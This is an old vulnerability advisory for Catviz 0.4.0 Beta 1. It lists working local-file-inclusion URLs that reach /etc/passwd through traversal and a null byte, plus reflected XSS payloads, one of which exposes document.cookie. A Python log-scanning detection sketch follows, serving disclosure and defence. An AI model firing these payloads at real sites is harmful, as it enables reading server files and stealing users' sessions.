Catviz 0.4.0b1 (LFI/XSS) Multiple Remote Vulnerabilities

2009.05.24
Credit: ByALBAYX
Risk: High
Local: No
Remote: Yes
CWE: CWE-22

Author  : ByALBAYX
Website : WWW.C4TEAM.ORG

Catviz 0.4.0 Beta 1

Demo:
http://catviz.sourceforge.net

LFI:

http://c4team.org/ [Path] /index.php?webpages_form=../../../../../../../../../../../../../etc/passwd%00
http://c4team.org/ [Path] /index.php?userman_form=../../../../../../../../../../../../../etc/passwd%00

XSS:

http://c4team.org/ [Path] /index.php?userman_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script>
http://c4team.org/ [Path] /index.php?webpages_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script>
http://c4team.org/ [Path] /index.php?userman_form="><script>alert(document.cookie)</script>
http://c4team.org/ [Path] /index.php?webpages_form="><script>alert(document.cookie)</script>
http://c4team.org/ [Path] /index.php?userman_form='><h1>ByALBAYX</h1><div style=display:none>
http://c4team.org/ [Path] /index.php?webpages_form='><h1>ByALBAYX</h1><div style=display:none>
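Detection sketch for the two parameters named in the advisory (webpages_form and userman_form), added here as an example and not part of the original advisory or of Catviz. It scans web server access log lines for directory traversal, null bytes and HTML markup in those parameters; the log lines, the combined log format and the benign value "about" are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

WATCHED = {"webpages_form", "userman_form"}  # parameters from the advisory
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/May/2009:10:00:01 +0000] "GET /index.php?webpages_form=../../../../etc/passwd%00 HTTP/1.1" 200 512',
    '203.0.113.5 - - [24/May/2009:10:00:02 +0000] "GET /index.php?userman_form=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 2048',
    '198.51.100.7 - - [24/May/2009:10:00:03 +0000] "GET /index.php?webpages_form=about HTTP/1.1" 200 1024',
    '198.51.100.7 - - [24/May/2009:10:00:04 +0000] "GET /index.php?userman_form=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 300',
]

def full_decode(value, rounds=3):
    """Undo repeated percent-encoding so %252e%252e%252f is seen as ../"""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def classify(value):
    """Return the set of findings for one decoded parameter value."""
    findings = set()
    if "../" in value or "..\\" in value:
        findings.add("traversal")
    if "\x00" in value:
        findings.add("null-byte")
    if re.search(r"[<>\"']", value):  # characters that break out of HTML context
        findings.add("markup")
    return findings

def scan(lines):
    """Return (line_number, parameter, sorted findings) for each suspicious hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            found = classify(full_decode(value)) if name in WATCHED else set()
            if found:
                hits.append((n, name, sorted(found)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The markup check is deliberately broad and will also flag a legitimate value containing an apostrophe, so treat those hits as candidates for review.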


Copyright 2024, cxsecurity.com

 
